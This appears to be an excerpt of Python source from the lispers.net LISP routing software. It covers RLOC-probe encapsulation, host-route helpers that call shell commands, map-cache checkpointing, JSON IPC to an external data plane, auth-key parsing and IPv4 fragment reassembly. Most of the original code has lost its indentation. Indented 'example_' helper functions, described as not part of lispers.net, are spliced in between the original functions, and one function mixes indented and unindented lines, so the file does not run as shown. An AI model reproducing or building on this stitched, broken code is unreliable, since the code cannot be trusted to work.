def lisp_encapsulate_rloc_probe(lisp_sockets, rloc, nat_info, packet):
if (len(lisp_sockets) != 4): return
local_addr = lisp_myrlocs[0]
#
# Build Map-Request IP header. Source and destination addresses same as
# the data encapsulation outer header.
#
length = len(packet) + 28
ip = struct.pack("BBHIBBHII", 0x45, 0, socket.htons(length), 0, 64,
17, 0, socket.htonl(local_addr.address), socket.htonl(rloc.address))
ip = lisp_ip_checksum(ip)
udp = struct.pack("HHHH", 0, socket.htons(LISP_CTRL_PORT),
socket.htons(length - 20), 0)
#
# Start data encapsulation logic.
#
packet = lisp_packet(ip + udp + packet)
#
# Setup fields we need for lisp_packet.encode().
#
packet.inner_dest.copy_address(rloc)
packet.inner_dest.instance_id = 0xffffff
packet.inner_source.copy_address(local_addr)
packet.inner_ttl = 64
packet.outer_dest.copy_address(rloc)
packet.outer_source.copy_address(local_addr)
packet.outer_version = packet.outer_dest.afi_to_version()
packet.outer_ttl = 64
packet.encap_port = nat_info.port if nat_info else LISP_DATA_PORT
rloc_str = red(rloc.print_address_no_iid(), False)
if (nat_info):
hostname = " {}".format(blue(nat_info.hostname, False))
probe = bold("RLOC-probe request", False)
else:
hostname = ""
probe = bold("RLOC-probe reply", False)
#endif
lprint(("Data encapsulate {} to {}{} port {} for " + \
"NAT-traversal").format(probe, rloc_str, hostname, packet.encap_port))
#
# Build data encapsulation header.
#
if (packet.encode(None) == None): return
packet.print_packet("Send", True)
raw_socket = lisp_sockets[3]
packet.send_packet(raw_socket, packet.outer_dest)
del(packet)
return
#enddef
#
# lisp_get_default_route_next_hops
#
# Put the interface name and next-hop of each IPv4 default route in an array
# and return to caller. The array has elements of [<device>, <nh>].
#
def lisp_get_default_route_next_hops():
#
# Get default route next-hop info differently for MacOS.
#
if (lisp_is_macos()):
cmd = "route -n get default"
fields = commands.getoutput(cmd).split("\n")
gw = interface = None
for f in fields:
if (f.find("gateway: ") != -1): gw = f.split(": ")[1]
if (f.find("interface: ") != -1): interface = f.split(": ")[1]
#endfor
return([[interface, gw]])
#endif
#
# Get default route next-hop info for Linuxes.
#
cmd = "ip route | egrep 'default via'"
default_routes = commands.getoutput(cmd).split("\n")
next_hops = []
for route in default_routes:
if (route.find(" metric ") != -1): continue
r = route.split(" ")
try:
via_index = r.index("via") + 1
if (via_index >= len(r)): continue
dev_index = r.index("dev") + 1
if (dev_index >= len(r)): continue
except:
continue
#endtry
next_hops.append([r[dev_index], r[via_index]])
#endfor
return(next_hops)
#enddef
#
# lisp_get_host_route_next_hop
#
# For already installed host route, get next-hop.
#
def lisp_get_host_route_next_hop(rloc):
cmd = "ip route | egrep '{} via'".format(rloc)
route = commands.getoutput(cmd).split(" ")
try: index = route.index("via") + 1
except: return(None)
if (index >= len(route)): return(None)
return(route[index])
#enddef
#
# lisp_install_host_route
#
# Install/deinstall host route.
#
def lisp_install_host_route(dest, nh, install):
install = "add" if install else "delete"
nh_str = "none" if nh == None else nh
lprint("{} host-route {}, nh {}".format(install.title(), dest, nh_str))
if (nh == None):
ar = "ip route {} {}/32".format(install, dest)
else:
ar = "ip route {} {}/32 via {}".format(install, dest, nh)
#endif
os.system(ar)
return
#enddef
#
# lisp_checkpoint
#
# This function will write entries from the checkpoint array to the checkpoint
# file "lisp.checkpoint".
#
def lisp_checkpoint(checkpoint_list):
if (lisp_checkpoint_map_cache == False): return
f = open(lisp_checkpoint_filename, "w")
for entry in checkpoint_list:
f.write(entry + "\n")
#endfor
f.close()
lprint("{} {} entries to file '{}'".format(bold("Checkpoint", False),
len(checkpoint_list), lisp_checkpoint_filename))
return
#enddef
#
# lisp_load_checkpoint
#
# Read entries from checkpoint file and write to map cache. Check function
# lisp_write_checkpoint_entry() for entry format description.
#
def lisp_load_checkpoint():
if (lisp_checkpoint_map_cache == False): return
if (os.path.exists(lisp_checkpoint_filename) == False): return
f = open(lisp_checkpoint_filename, "r")
count = 0
for entry in f:
count += 1
e = entry.split(" rloc ")
rlocs = [] if (e[1] in ["native-forward\n", "\n"]) else \
e[1].split(", ")
rloc_set = []
for rloc in rlocs:
rloc_entry = lisp_rloc(False)
r = rloc.split(" ")
rloc_entry.rloc.store_address(r[0])
rloc_entry.priority = int(r[1])
rloc_entry.weight = int(r[2])
rloc_set.append(rloc_entry)
#endfor
mc = lisp_mapping("", "", rloc_set)
if (mc != None):
mc.eid.store_prefix(e[0])
mc.checkpoint_entry = True
mc.map_cache_ttl = LISP_NMR_TTL * 60
if (rloc_set == []): mc.action = LISP_NATIVE_FORWARD_ACTION
mc.add_cache()
continue
#endif
count -= 1
#endfor
f.close()
lprint("{} {} map-cache entries from file '{}'".format(
bold("Loaded", False), count, lisp_checkpoint_filename))
return
#enddef
#
# lisp_write_checkpoint_entry
#
# Write one map-cache entry to checkpoint array list. The format of a
# checkpoint entry is:
#
# [<iid>]<eid-prefix> rloc <rloc>, <rloc>, ...
#
# where <rloc> is formatted as:
#
# <rloc-address> <priority> <weight>
#
def lisp_write_checkpoint_entry(checkpoint_list, mc):
if (lisp_checkpoint_map_cache == False): return
entry = "{} rloc ".format(mc.eid.print_prefix())
for rloc_entry in mc.rloc_set:
if (rloc_entry.rloc.is_null()): continue
entry += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
rloc_entry.priority, rloc_entry.weight)
#endfor
if (mc.rloc_set != []):
entry = entry[0:-2]
elif (mc.action == LISP_NATIVE_FORWARD_ACTION):
entry += "native-forward"
#endif
checkpoint_list.append(entry)
return
#enddef
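#
# example_checkpoint_entries
#
# Illustrative checkpoint entries (assumed values) in the format described
# above lisp_write_checkpoint_entry().
#
def example_checkpoint_entries():
    return([
        "[1000]10.0.0.0/8 rloc 192.168.1.1 1 100, 192.168.2.1 2 50",
        "[1000]10.1.0.0/16 rloc native-forward"
    ])
#enddef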
#
# lisp_check_dp_socket
#
# Check if lisp-ipc-data-plane socket exists.
#
def lisp_check_dp_socket():
socket_name = lisp_ipc_dp_socket_name
if (os.path.exists(socket_name) == False):
dne = bold("does not exist", False)
lprint("Socket '{}' {}".format(socket_name, dne))
return(False)
#endif
return(True)
#enddef
#
# lisp_write_to_dp_socket
#
# Write a JSON record to the lisp-ipc-data-plane named socket.
#
def lisp_write_to_dp_socket(entry):
    rec = None
    try:
        rec = json.dumps(entry)
write = bold("Write IPC", False)
lprint("{} record to named socket: '{}'".format(write, rec))
lisp_ipc_dp_socket.sendto(rec, lisp_ipc_dp_socket_name)
except:
lprint("Failed to write IPC record to named socket: '{}'".format(rec))
#endtry
return
#enddef
#
# lisp_write_ipc_keys
#
# Security keys have changed for an RLOC. Find all map-cache entries that are
# affected. The lisp_rloc_probe_rlocs has the list of EIDs for a given RLOC
# address. Tell the external data-plane for each one.
#
def lisp_write_ipc_keys(rloc):
addr_str = rloc.rloc.print_address_no_iid()
port = rloc.translated_port
if (port != 0): addr_str += ":" + str(port)
if (lisp_rloc_probe_list.has_key(addr_str) == False): return
for r, e, g in lisp_rloc_probe_list[addr_str]:
mc = lisp_map_cache.lookup_cache(e, True)
if (mc == None): continue
lisp_write_ipc_map_cache(True, mc)
#endfor
return
#enddef
#
# lisp_write_ipc_map_cache
#
# Write a map-cache entry to named socket "lisp-ipc-data-plane".
#
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Write record in JSON format.
#
add = "add" if add_or_delete else "delete"
entry = { "type" : "map-cache", "opcode" : add }
multicast = (mc.group.is_null() == False)
if (multicast):
entry["eid-prefix"] = mc.group.print_prefix_no_iid()
entry["rles"] = []
else:
entry["eid-prefix"] = mc.eid.print_prefix_no_iid()
entry["rlocs"] = []
#endif
entry["instance-id"] = str(mc.eid.instance_id)
if (multicast):
if (len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle):
for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
addr = rle_node.address.print_address_no_iid()
port = str(4341) if rle_node.translated_port == 0 else \
str(rle_node.translated_port)
r = { "rle" : addr, "port" : port }
ekey, ikey = rle_node.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rles"].append(r)
#endfor
#endif
else:
for rloc in mc.rloc_set:
if (rloc.rloc.is_ipv4() == False and rloc.rloc.is_ipv6() == False):
continue
#endif
if (rloc.up_state() == False): continue
port = str(4341) if rloc.translated_port == 0 else \
str(rloc.translated_port)
r = { "rloc" : rloc.rloc.print_address_no_iid(), "priority" :
str(rloc.priority), "weight" : str(rloc.weight), "port" :
port }
ekey, ikey = rloc.get_encap_keys()
r = lisp_build_json_keys(r, ekey, ikey, "encrypt-key")
entry["rlocs"].append(r)
#endfor
#endif
if (dont_send == False): lisp_write_to_dp_socket(entry)
return(entry)
#enddef
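#
# example_map_cache_ipc_entry
#
# Illustrative "map-cache" IPC record (assumed values) as built by
# lisp_write_ipc_map_cache() for a unicast entry.
#
def example_map_cache_ipc_entry():
    return({ "type" : "map-cache", "opcode" : "add",
        "eid-prefix" : "10.0.0.0/8", "instance-id" : "1000",
        "rlocs" : [ { "rloc" : "192.168.1.1", "priority" : "1",
            "weight" : "100", "port" : "4341" } ] })
#enddef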
#
# lisp_write_ipc_decap_key
#
# In the lisp-etr process, write an RLOC record to the ipc-data-plane socket.
#
def lisp_write_ipc_decap_key(rloc_addr, keys):
if (lisp_i_am_itr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
# Get decryption key. If there is none, do not send message.
#
if (keys == None or len(keys) == 0 or keys[1] == None): return
ekey = keys[1].encrypt_key
ikey = keys[1].icv_key
#
# Write record in JSON format. Store encryption key.
#
rp = rloc_addr.split(":")
if (len(rp) == 1):
entry = { "type" : "decap-keys", "rloc" : rp[0] }
else:
entry = { "type" : "decap-keys", "rloc" : rp[0], "port" : rp[1] }
#endif
entry = lisp_build_json_keys(entry, ekey, ikey, "decrypt-key")
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_build_json_keys
#
# Build the following for both the ITR encryption side and the ETR decryption
# side.
#
def lisp_build_json_keys(entry, ekey, ikey, key_type):
if (ekey == None): return(entry)
entry["keys"] = []
key = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
entry["keys"].append(key)
return(entry)
#enddef
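#
# example_build_json_keys_usage
#
# Illustrative usage only (not part of lispers.net): address and key strings
# below are assumed values.
#
def example_build_json_keys_usage():
    entry = { "type" : "decap-keys", "rloc" : "10.0.0.1" }
    #
    # Returns entry with "keys" : [{ "key-id" : "1",
    # "decrypt-key" : "<ekey>", "icv-key" : "<ikey>" }] appended.
    #
    return(lisp_build_json_keys(entry, "<ekey>", "<ikey>", "decrypt-key"))
#enddef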
#
# lisp_write_ipc_database_mappings
#
# In the lisp-etr process, write database-mapping records to the ipc-data-
# plane socket.
#
def lisp_write_ipc_database_mappings(ephem_port):
if (lisp_i_am_etr == False): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "database-mappings", "database-mappings" : [] }
#
# Write only IPv4 and IPv6 EIDs.
#
for db in lisp_db_list:
if (db.eid.is_ipv4() == False and db.eid.is_ipv6() == False): continue
record = { "instance-id" : str(db.eid.instance_id),
"eid-prefix" : db.eid.print_prefix_no_iid() }
entry["database-mappings"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
#
# Write ephemeral NAT port an external data-plane needs to receive
# encapsulated packets from the RTR.
#
entry = { "type" : "etr-nat-port", "port" : ephem_port }
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_write_ipc_interfaces
#
# In the lisp-itr or lisp-rtr process, write the interface list to the ipc-
# data-plane socket.
#
def lisp_write_ipc_interfaces():
if (lisp_i_am_etr): return
if (lisp_ipc_dp_socket == None): return
if (lisp_check_dp_socket() == False): return
#
    # Write record in JSON format.
#
entry = { "type" : "interfaces", "interfaces" : [] }
for interface in lisp_myinterfaces.values():
if (interface.instance_id == None): continue
record = { "interface" : interface.device,
"instance-id" : str(interface.instance_id) }
entry["interfaces"].append(record)
#endfor
lisp_write_to_dp_socket(entry)
return
#enddef
#
# lisp_parse_auth_key
#
# Look for values for "authentication-key" in the various forms of:
#
# <password>
# [<key-id>]<password>
# [<key-id>]<password> [<key-id>]<password> [<key-id>]<password>
#
# Return an auth_key{} where the keys of the dictionary array are type
# integers and the values are type string.
#
def lisp_parse_auth_key(value):
values = value.split("[")
auth_key = {}
if (len(values) == 1):
auth_key[0] = value
return(auth_key)
#endif
for v in values:
if (v == ""): continue
index = v.find("]")
key_id = v[0:index]
try: key_id = int(key_id)
except: return
auth_key[key_id] = v[index+1::]
#endfor
return(auth_key)
#enddef
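#
# example_parse_auth_key_usage
#
# Illustrative usage only (not part of lispers.net) of the three accepted
# forms. Note the multi-key form keeps the space before the next '[' as
# part of the password value.
#
def example_parse_auth_key_usage():
    one = lisp_parse_auth_key("secret")           # {0 : "secret"}
    two = lisp_parse_auth_key("[3]secret")        # {3 : "secret"}
    three = lisp_parse_auth_key("[1]foo [2]bar")  # {1 : "foo ", 2 : "bar"}
    return(one, two, three)
#enddef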
#
# lisp_reassemble
#
# Reassemble an IPv4 datagram. The result is a LISP encapsulated packet.
#
# An entry in the queue is a multi-tuple of:
#
# <frag-offset>, <frag-length>, <packet-with-header>, <last-frag-is-true>
#
# When it is not a LISP/VXLAN encapsulated packet, the multi-tuple will be
# for the first fragment:
#
# <frag-offset>, <frag-length>, None, <last-frag-is-true>
#
def lisp_reassemble(packet):
fo = socket.ntohs(struct.unpack("H", packet[6:8])[0])
#
    # Not a fragment (offset field 0 with no MF bit, or the DF bit set), so
    # return packet and process.
#
if (fo == 0 or fo == 0x4000): return(packet)
#
# Get key fields from fragment.
#
ident = socket.ntohs(struct.unpack("H", packet[4:6])[0])
fl = socket.ntohs(struct.unpack("H", packet[2:4])[0])
last_frag = (fo & 0x2000 == 0 and (fo & 0x1fff) != 0)
entry = [(fo & 0x1fff) * 8, fl - 20, packet, last_frag]
#
# If first fragment, check to see if LISP packet. Do not reassemble if
# source or destination port is not 4341, 8472 or 4789. But add this to
# the queue so when other fragments come in, we know to not queue them.
# If other fragments came in before the first fragment, remove them from
# the queue.
#
if (fo == 0x2000):
sport, dport = struct.unpack("HH", packet[20:24])
sport = socket.ntohs(sport)
dport = socket.ntohs(dport)
if (dport not in [4341, 8472, 4789] and sport != 4341):
lisp_reassembly_queue[ident] = []
entry[2] = None
#endif
#endif
#
    # Initialize list on first fragment to arrive. Indexed by IPv4 Ident.
#
if (lisp_reassembly_queue.has_key(ident) == False):
lisp_reassembly_queue[ident] = []
#endif
#
# Get fragment queue based on IPv4 Ident.
#
queue = lisp_reassembly_queue[ident]
#
    # Do not queue fragment if the first fragment arrived and we determined
    # it's not a LISP encapsulated packet.
#
if (len(queue) == 1 and queue[0][2] == None):
dprint("Drop non-LISP encapsulated fragment 0x{}".format( \
lisp_hex_string(ident).zfill(4)))
return(None)
#endif
#
# Insert in sorted order.
#
queue.append(entry)
queue = sorted(queue)
#
# Print addresses.
#
addr = lisp_address(LISP_AFI_IPV4, "", 32, 0)
addr.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
src = addr.print_address_no_iid()
addr.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
dst = addr.print_address_no_iid()
addr = red("{} -> {}".format(src, dst), False)
dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format( \
bold("Received", False), " non-LISP encapsulated" if \
entry[2] == None else "", addr, lisp_hex_string(ident).zfill(4),
lisp_hex_string(fo).zfill(4)))
#
# Check if all fragments arrived. First check if first and last fragments
# are in queue.
#
if (queue[0][0] != 0 or queue[-1][3] == False): return(None)
last_entry = queue[0]
for frag in queue[1::]:
fo = frag[0]
last_fo, last_fl = last_entry[0], last_entry[1]
if (last_fo + last_fl != fo): return(None)
last_entry = frag
#endfor
lisp_reassembly_queue.pop(ident)
#
# If we did not return, we have all fragments. Now append them. Keep the
# IP header in the first fragment but remove in each other fragment.
#
packet = queue[0][2]
for frag in queue[1::]: packet += frag[2][20::]
dprint("{} fragments arrived for packet 0x{}, length {}".format( \
bold("All", False), lisp_hex_string(ident).zfill(4), len(packet)))
#
# Fix length and frag-offset field before returning and fixup checksum.
#
length = socket.htons(len(packet))
header = packet[0:2] + struct.pack("H", length) + packet[4:6] + \
struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + \
packet[12:20]
header = lisp_ip_checksum(header)
return(header + packet[20::])
#enddef
#
# lisp_get_crypto_decap_lookup_key
#
# Return None if we cannot find <addr>:<port> or <addr> in lisp_crypto_
# keys_by_rloc_decap{}.
#
def lisp_get_crypto_decap_lookup_key(addr, port):
addr_str = addr.print_address_no_iid() + ":" + str(port)
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
addr_str = addr.print_address_no_iid()
if (lisp_crypto_keys_by_rloc_decap.has_key(addr_str)): return(addr_str)
#
# We are at non-NAT based xTR. We need to get the keys from an RTR
# or another non-NAT based xTR. Move addr+port to addr.
#
for ap in lisp_crypto_keys_by_rloc_decap:
a = ap.split(":")
if (len(a) == 1): continue
a = a[0] if len(a) == 2 else ":".join(a[0:-1])
if (a == addr_str):
keys = lisp_crypto_keys_by_rloc_decap[ap]
lisp_crypto_keys_by_rloc_decap[addr_str] = keys
return(addr_str)
#endif
#endfor
return(None)
#enddef
#
# lisp_build_crypto_decap_lookup_key
#
# Decide to return <addr>:<port> or <addr> depending if the RLOC is behind
# a NAT. This is used on the RTR. Check the lisp probing cache. If we find
# an RLOC with a port number stored, then it is behind a NAT. Otherwise,
# the supplied port is not relevant and we want to create a "port-less" decap
# entry for an xTR that is in public address space.
#
def lisp_build_crypto_decap_lookup_key(addr, port):
addr = addr.print_address_no_iid()
addr_and_port = addr + ":" + str(port)
if (lisp_i_am_rtr):
if (lisp_rloc_probe_list.has_key(addr)): return(addr)
#
# Have to check NAT cache to see if RLOC is translated. If not, this
        # is an xTR in public space. We'll have to change this in the future
        # so we don't do a full table traversal. But this traversal only
        # happens when the RLOC is not in the RLOC-probe list.
#
for nat_info in lisp_nat_state_info.values():
for nat in nat_info:
if (addr == nat.address): return(addr_and_port)
#endfor
#endif
return(addr)
#endif
return(addr_and_port)
#enddef
#
# lisp_set_ttl
#
# Set send IP TTL for outgoing packet.
#
def lisp_set_ttl(lisp_socket, ttl):
try:
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
except:
lprint("socket.setsockopt(IP_TTL) not supported")
pass
#endtry
return
#enddef
#
# lisp_is_rloc_probe_request
#
# Pass LISP first byte to test for 0x12, a Map-Request RLOC-probe (type 1
# with the probe-bit set).
#
def lisp_is_rloc_probe_request(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x12)
#enddef
#
# lisp_is_rloc_probe_reply
#
# Pass LISP first byte to test for 0x28, a Map-Reply RLOC-probe (type 2
# with the probe-bit set).
#
def lisp_is_rloc_probe_reply(lisp_type):
lisp_type = struct.unpack("B", lisp_type)[0]
return(lisp_type == 0x28)
#enddef
#
# lisp_is_rloc_probe
#
# If this is a RLOC-probe received by the data-plane (from a pcap filter),
# then return source address, source port, ttl, and position packet to the
# beginning of the LISP header. The packet pointer entering this function is
# the beginning of an IPv4 header.
#
# If rr (request-or-reply) is:
#
# 0: Check for Map-Request RLOC-probe (ETR case)
# 1: Check for Map-Reply RLOC-probe (ITR case)
# -1: Check for either (RTR case)
#
# Return packet pointer untouched if not an RLOC-probe. If it is an RLOC-probe
# request or reply from ourselves, return packet pointer None and source None.
#
def lisp_is_rloc_probe(packet, rr):
udp = (struct.unpack("B", packet[9])[0] == 17)
if (udp == False): return([packet, None, None, None])
sport = struct.unpack("H", packet[20:22])[0]
dport = struct.unpack("H", packet[22:24])[0]
is_lisp = (socket.htons(LISP_CTRL_PORT) in [sport, dport])
if (is_lisp == False): return([packet, None, None, None])
if (rr == 0):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == 1):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
elif (rr == -1):
probe = lisp_is_rloc_probe_request(packet[28])
if (probe == False):
probe = lisp_is_rloc_probe_reply(packet[28])
if (probe == False): return([packet, None, None, None])
#endif
#endif
#
# Get source address, source port, and TTL. Decrement TTL.
#
source = lisp_address(LISP_AFI_IPV4, "", 32, 0)
source.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
#
# If this is a RLOC-probe from ourselves, drop.
#
if (source.is_local()): return([None, None, None, None])
#
# Accept, and return source, port, and ttl to caller.
#
source = source.print_address_no_iid()
port = socket.ntohs(struct.unpack("H", packet[20:22])[0])
ttl = struct.unpack("B", packet[8])[0] - 1
packet = packet[28::]
r = bold("Receive(pcap)", False)
f = bold("from " + source, False)
p = lisp_format_packet(packet)
lprint("{} {} bytes {} {}, packet: {}".format(r, len(packet), f, port, p))
return([packet, source, port, ttl])
#enddef
#
# lisp_ipc_write_xtr_parameters
#
# When an external data-plane is running, write the following parameters
# to it:
#
# ipc = { "type" : "xtr-parameters", "control-plane-logging" : False,
# "data-plane-logging" : False, "rtr" : False }
#
def lisp_ipc_write_xtr_parameters(cp, dp):
if (lisp_ipc_dp_socket == None): return
ipc = { "type" : "xtr-parameters", "control-plane-logging" : cp,
"data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }
lisp_write_to_dp_socket(ipc)
return
#enddef
#
# lisp_external_data_plane
#
# Return True if an external data-plane is running. That means that "ipc-data-
# plane = yes" is configured or the lisp-xtr go binary is running.
#
def lisp_external_data_plane():
cmd = 'egrep "ipc-data-plane = yes" ./lisp.config'
if (commands.getoutput(cmd) != ""): return(True)
if (os.getenv("LISP_RUN_LISP_XTR") != None): return(True)
return(False)
#enddef
#
# lisp_process_data_plane_restart
#
# The external data-plane has restarted. We will touch the lisp.config file so
# all configuration information is sent and then traverse the map-cache
# sending each entry to the data-plane so it can regain its state.
#
# This function will also clear the external data-plane map-cache when a user
# clears the map-cache in the lisp-itr or lisp-rtr process.
#
# { "type" : "restart" }
#
def lisp_process_data_plane_restart(do_clear=False):
os.system("touch ./lisp.config")
jdata = { "type" : "entire-map-cache", "entries" : [] }
if (do_clear == False):
entries = jdata["entries"]
lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, entries)
#endif
lisp_write_to_dp_socket(jdata)
return
#enddef
#
# lisp_process_data_plane_stats
#
# { "type" : "statistics", "entries" :
# [ { "instance-id" : "<iid>", "eid-prefix" : "<eid>", "rlocs" : [
# { "rloc" : "<rloc-1>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : "<timestamp>" }, ...
# { "rloc" : "<rloc-n>", "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <system-uptime> } ], ... }
# ]
# }
#
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
if (msg.has_key("entries") == False):
lprint("No 'entries' in stats IPC message")
return
#endif
if (type(msg["entries"]) != list):
lprint("'entries' in stats IPC message must be an array")
return
#endif
for msg in msg["entries"]:
if (msg.has_key("eid-prefix") == False):
lprint("No 'eid-prefix' in stats IPC message")
continue
#endif
eid_str = msg["eid-prefix"]
if (msg.has_key("instance-id") == False):
lprint("No 'instance-id' in stats IPC message")
continue
#endif
iid = int(msg["instance-id"])
#
# Lookup EID-prefix in map-cache.
#
eid = lisp_address(LISP_AFI_NONE, "", 0, iid)
eid.store_prefix(eid_str)
mc = lisp_map_cache_lookup(None, eid)
if (mc == None):
lprint("Map-cache entry for {} not found for stats update". \
format(eid_str))
continue
#endif
if (msg.has_key("rlocs") == False):
lprint("No 'rlocs' in stats IPC message for {}".format( \
eid_str))
continue
#endif
if (type(msg["rlocs"]) != list):
lprint("'rlocs' in stats IPC message must be an array")
continue
#endif
ipc_rlocs = msg["rlocs"]
#
# Loop through RLOCs in IPC message.
#
for ipc_rloc in ipc_rlocs:
if (ipc_rloc.has_key("rloc") == False): continue
rloc_str = ipc_rloc["rloc"]
if (rloc_str == "no-address"): continue
rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
rloc.store_address(rloc_str)
rloc_entry = mc.get_rloc(rloc)
if (rloc_entry == None): continue
#
# Update stats.
#
pc = 0 if ipc_rloc.has_key("packet-count") == False else \
ipc_rloc["packet-count"]
bc = 0 if ipc_rloc.has_key("byte-count") == False else \
ipc_rloc["byte-count"]
ts = 0 if ipc_rloc.has_key("seconds-last-packet") == False else \
ipc_rloc["seconds-last-packet"]
rloc_entry.stats.packet_count += pc
rloc_entry.stats.byte_count += bc
rloc_entry.stats.last_increment = lisp_get_timestamp() - ts
lprint("Update stats {}/{}/{}s for {} RLOC {}".format(pc, bc,
ts, eid_str, rloc_str))
#endfor
#
# Check if this map-cache entry needs refreshing.
#
if (mc.group.is_null() and mc.has_ttl_elapsed()):
eid_str = green(mc.print_eid_tuple(), False)
lprint("Refresh map-cache entry {}".format(eid_str))
lisp_send_map_request(lisp_sockets, lisp_port, None, mc.eid, None)
#endif
#endfor
return
#enddef
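#
# example_stats_ipc_message
#
# Illustrative "statistics" IPC message (assumed values) in the format
# documented above lisp_process_data_plane_stats().
#
def example_stats_ipc_message():
    return({ "type" : "statistics", "entries" : [
        { "instance-id" : "1000", "eid-prefix" : "10.0.0.0/8", "rlocs" : [
            { "rloc" : "192.168.1.1", "packet-count" : 100,
              "byte-count" : 142800, "seconds-last-packet" : 2 } ] } ] })
#enddef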
#
# lisp_process_data_plane_decap_stats
#
# { "type" : "decap-statistics",
# "no-decrypt-key" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "outer-header-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "bad-inner-version" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "good-packets" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "ICV-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> },
# "checksum-error" : { "packet-count" : <count>, "byte-count" : <bcount>,
# "seconds-last-packet" : <seconds> }
# }
#
# If we are an RTR, we can process the stats directly. If we are an ITR, we
# need to send an IPC message to the lisp-etr process.
#
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):
#
# Send IPC message to lisp-etr process. Variable 'msg' is a dict array.
# Needs to be passed in IPC message as a string.
#
if (lisp_i_am_itr):
lprint("Send decap-stats IPC message to lisp-etr process")
ipc = "stats%{}".format(json.dumps(msg))
ipc = lisp_command_ipc(ipc, "lisp-itr")
lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
return
#endif
#
# Process stats counters in lisp-etr and lisp-rtr processes. Variable 'msg'
    # is a dictionary array when the ITR/RTR is processing it. When an ETR
    # is processing it, it received a JSON string from the ITR so it needs
    # to convert it to a dictionary array.
#
ipc = bold("IPC", False)
lprint("Process decap-stats {} message: '{}'".format(ipc, msg))
if (lisp_i_am_etr): msg = json.loads(msg)
key_names = ["good-packets", "ICV-error", "checksum-error",
"lisp-header-error", "no-decrypt-key", "bad-inner-version",
"outer-header-error"]
for key_name in key_names:
pc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["packet-count"]
lisp_decap_stats[key_name].packet_count += pc
bc = 0 if msg.has_key(key_name) == False else \
msg[key_name]["byte-count"]
lisp_decap_stats[key_name].byte_count += bc
ts = 0 if msg.has_key(key_name) == False else \
msg[key_name]["seconds-last-packet"]
lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
#endfor
return
#enddef
#
# lisp_process_punt
#
# Another data-plane is punting a packet to us so we can discover a source
# EID, send a Map-Request, or store statistics data. The JSON message types
# are: "discovery", "restart", "statistics", and "decap-statistics". This
# function calls helper functions for the stats and restart types but
# processes the "discovery" logic itself:
#
# { "type" : "discovery", "source-eid" : <eid-source-address>,
# "dest-eid" : <eid-dest-address>, "interface" : "<device-name>",
# "instance-id" : <iid> }
#
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
message, source = punt_socket.recvfrom(4000)
msg = json.loads(message)
if (type(msg) != dict):
lprint("Invalid punt message from {}, not in JSON format". \
format(source))
return
#endif
punt = bold("Punt", False)
lprint("{} message from '{}': '{}'".format(punt, source, msg))
if (msg.has_key("type") == False):
lprint("Punt IPC message has no 'type' key")
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "statistics"):
lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
return
#endif
if (msg["type"] == "decap-statistics"):
lisp_process_data_plane_decap_stats(msg, punt_socket)
return
#endif
#
# Process statistics message.
#
if (msg["type"] == "restart"):
lisp_process_data_plane_restart()
return
#endif
#
# Process possible punt packet discovery message.
#
if (msg["type"] != "discovery"):
lprint("Punt IPC message has wrong format")
return
#endif
if (msg.has_key("interface") == False):
lprint("Invalid punt message from {}, required keys missing". \
format(source))
return
#endif
#
# Drop control-messages designated as instance-ID 0xffffff (or -1 in JSON).
#
device = msg["interface"]
if (device == ""):
iid = int(msg["instance-id"])
if (iid == -1): return
else:
iid = lisp_get_interface_instance_id(device, None)
#endif
#
# Validate EID format.
#
seid = None
if (msg.has_key("source-eid")):
source_eid = msg["source-eid"]
seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
if (seid.is_null()):
lprint("Invalid source-EID format '{}'".format(source_eid))
return
#endif
#endif
deid = None
if (msg.has_key("dest-eid")):
dest_eid = msg["dest-eid"]
